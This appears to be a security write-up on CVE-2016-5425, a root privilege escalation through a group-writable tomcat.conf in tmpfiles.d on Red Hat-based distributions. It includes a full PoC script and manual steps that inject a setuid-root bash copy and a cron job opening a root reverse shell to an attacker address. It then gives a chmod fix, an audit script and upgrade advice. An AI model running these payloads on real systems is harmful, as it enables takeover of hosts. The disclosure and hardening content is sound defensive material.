Description
Tomcat has been in the news lately, and less than a month after the last issue another vulnerability surfaced. On October 11, 2016 a Tomcat local privilege escalation vulnerability, CVE-2016-5425, was published. It affects the Apache Tomcat packages shipped by Red Hat based distributions, including CentOS, RHEL, Oracle Linux and Fedora. The root cause is that the tomcat group has read and write permission on the /usr/lib/tmpfiles.d/tomcat.conf configuration file, so any member of that group, or a webshell running with ordinary tomcat privileges, can escalate to root.
Vulnerability description
After Tomcat is installed from the Red Hat distribution packages, members of the tomcat group have write access to tomcat.conf, as shown here:
# ls -al /usr/lib/tmpfiles.d/tomcat.conf
-rw-rw-r--. 1 root tomcat 43 May 12  2015 /usr/lib/tmpfiles.d/tomcat.conf
The files under /usr/lib/tmpfiles.d are configuration for systemd-tmpfiles, which creates, removes and adjusts temporary files and directories. An attacker can easily inject a malicious payload into tomcat.conf, for example an entry that writes a reverse-shell cron job or one that creates a setuid-root copy of a shell. When /usr/bin/systemd-tmpfiles runs, as root, it acts on the injected lines as well.
On Red Hat distributions, systemd-tmpfiles is run at boot by the systemd-tmpfiles-setup.service unit:
# grep ExecStart /usr/lib/systemd/system/systemd-tmpfiles-setup.service
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depending on how the system is used, systemd-tmpfiles --create may also be triggered by other services, cron jobs, startup scripts and so on. (The daily systemd-tmpfiles-clean.timer only runs systemd-tmpfiles --clean, which applies age-based cleanup and does not process create entries, so it does not trigger the payload.) Another point worth noting is that systemd-tmpfiles does not abort on a syntax error in a configuration file; it logs the bad line and keeps processing the rest. An attacker can therefore append payload lines to /usr/lib/tmpfiles.d/tomcat.conf without caring about the existing content.
In the PoC below, the following three lines are appended to tomcat.conf. They copy /bin/bash to a new location, make that copy setuid root, and write a cron job that spawns a reverse shell every minute; the meaning of the C, z and F entry types is documented in man 5 tmpfiles.d. Note the case: C (copy a file) and F (create or truncate a file and write the argument into it), not c (create a character device node) or f.
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
PoC
-----------[tomcat-rh-root.sh]---------
#!/bin/bash
# Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit
# CVE-2016-5425
#
# Full advisory at:
# http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
#
# Discovered and coded by:
# Dawid Golunski
# http://legalhackers.com
#
# Tested on RedHat, CentOS, OracleLinux, Fedora systems.
#
# For testing purposes only.
#

ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9090

echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *"
echo -e "  Discovered by Dawid Golunski\n"

echo "[+] Checking vulnerability"
# A weak check: it only confirms that the group shown by ls -l is 'tomcat'.
ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat'
if [ $? -ne 0 ]; then
    echo "Not vulnerable or tomcat installed under a different user than 'tomcat'"
    exit 1
fi

echo -e "\n[+] Your system is vulnerable!"

echo -e "\n[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf..."
# C copies /bin/bash, z makes the copy setuid root, F writes a cron.d entry
# that opens a reverse shell every minute.
cat <<_eof_ >>/usr/lib/tmpfiles.d/tomcat.conf
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
_eof_

echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:"
cat /usr/lib/tmpfiles.d/tomcat.conf

echo -e "\n[+] Payload injected! Wait for your root shell...\n"
echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc), the rootshell will be created in /usr/share/tomcat/rootsh. Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT\n"
--------------[eof]--------------------
Local testing:
1. First determine the local Linux distribution and the Tomcat version.
2. Switch to a user in the tomcat group and append the malicious payload to the /usr/lib/tmpfiles.d/tomcat.conf file:
cat <<_eof_ >>/usr/lib/tmpfiles.d/tomcat.conf
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/192.168.1.3/9999 0<&1 2>&1 & \n\n"
_eof_
3. As root, trigger /usr/bin/systemd-tmpfiles --create manually. [This step is the weak point of the exploit: in real use it depends on something else on the system, another service, a cron job or a boot script, running systemd-tmpfiles --create. If such a trigger exists, fine; if not, the vulnerability is only usable after a reboot or some other trigger, which makes it rather marginal.]
# /usr/bin/systemd-tmpfiles --create
4. Receive the reverse shell, which runs with root privileges.
Vulnerability impact
A local attacker with tomcat privileges can append to the configuration file and escalate to root. A remote attacker can exploit it as well when it is combined with a web application vulnerability that yields code execution as the tomcat user, for example through a webshell.
Affected versions
The Tomcat packages shipped by CentOS, Fedora, Oracle Linux and Red Hat Enterprise Linux. The issue lies in the distribution packaging, not in upstream Apache Tomcat.
Red Hat's official details: https://access.redhat.com/security/cve/CVE-2016-5425
Workaround / temporary fix
Remove the tomcat group's write permission on /usr/lib/tmpfiles.d/tomcat.conf:
chmod 644 /usr/lib/tmpfiles.d/tomcat.conf
Afterwards confirm with ls -l that the file is no longer group-writable, and inspect its contents for lines that were already appended; rpm -V tomcat will report the tampered file as a size and checksum mismatch.
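Added example (not from the advisory or from the Red Hat packaging): a small shell audit that lists tmpfiles.d drop-ins writable by their group or by others across the three directories systemd-tmpfiles reads, plus a hardening function that removes those write bits and verifies the result. It reads permissions with ls -l rather than a GNU-specific stat call; the sample directory it can build for a stand-alone run is constructed, not a real system path.

```shell
#!/bin/bash
# Added example for this write-up, not part of the original advisory or of the
# Red Hat tomcat package. Audits tmpfiles.d drop-ins for write permission
# granted to the group or to others (the CVE-2016-5425 condition) and removes it.
# Permissions are read with `ls -l`, so this works with any POSIX userland.

# Print "perms owner path" for every *.conf under the given directories whose
# group or other write bit is set. Returns 1 if any such file exists, else 0.
find_writable_tmpfiles() {
    local found=0 dir f perms owner
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*.conf; do
            [ -f "$f" ] || continue
            perms="$(ls -ld "$f" | cut -c1-10)"      # e.g. -rw-rw-r--
            owner="$(ls -ld "$f" | awk '{print $3}')"
            case "$perms" in
                ?????w*|????????w*)                   # 6th char = group w, 9th = other w
                    echo "$perms $owner $f"; found=1 ;;
            esac
        done
    done
    return "$found"
}

# Remove the group and other write bits from one file and verify the result.
# (The write-up uses `chmod 644`; go-w has the same effect on a 664 file
# without touching any other bits.) Returns 0 when the file is no longer writable.
harden_tmpfiles_conf() {
    local f="$1" perms
    chmod go-w "$f" || return 1
    perms="$(ls -ld "$f" | cut -c1-10)"
    case "$perms" in
        ?????w*|????????w*) echo "$f: still writable ($perms)"; return 1 ;;
    esac
    return 0
}

# Constructed sample directory for a stand-alone run: one drop-in with the
# vulnerable 664 mode and one with the expected 644 mode. Not real system files.
make_sample_tmpfiles_dir() {
    local dir
    dir="$(mktemp -d)"
    printf 'd /run/tomcat 0755 tomcat tomcat -\n' > "$dir/tomcat.conf"
    chmod 664 "$dir/tomcat.conf"
    printf 'd /run/example 0755 root root -\n' > "$dir/example.conf"
    chmod 644 "$dir/example.conf"
    echo "$dir"
}

# Stand-alone use: audit the directories given on the command line, or the
# three directories systemd-tmpfiles reads when none are given.
if [ $# -eq 0 ]; then
    set -- /etc/tmpfiles.d /run/tmpfiles.d /usr/lib/tmpfiles.d
fi
if find_writable_tmpfiles "$@"; then
    echo "no group- or world-writable tmpfiles.d drop-ins under: $*"
fi
```

The audit is read-only; call harden_tmpfiles_conf on each reported path once you have checked the file's contents, and re-run the audit after a package update, since a package that ships the wrong mode can reintroduce it.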
Update to the latest Tomcat package
The Red Hat security team has already released fixed tomcat packages for the affected distributions; updating tomcat from the distribution's own repositories resolves the issue.
References
http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
http://legalhackers.com/exploits/tomcat-RH-root.sh
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425
https://access.redhat.com/security/cve/CVE-2016-5425
http://bobao.360.cn/learning/detail/3090.html
Apache Tomcat local privilege escalation vulnerability in Red Hat based distributions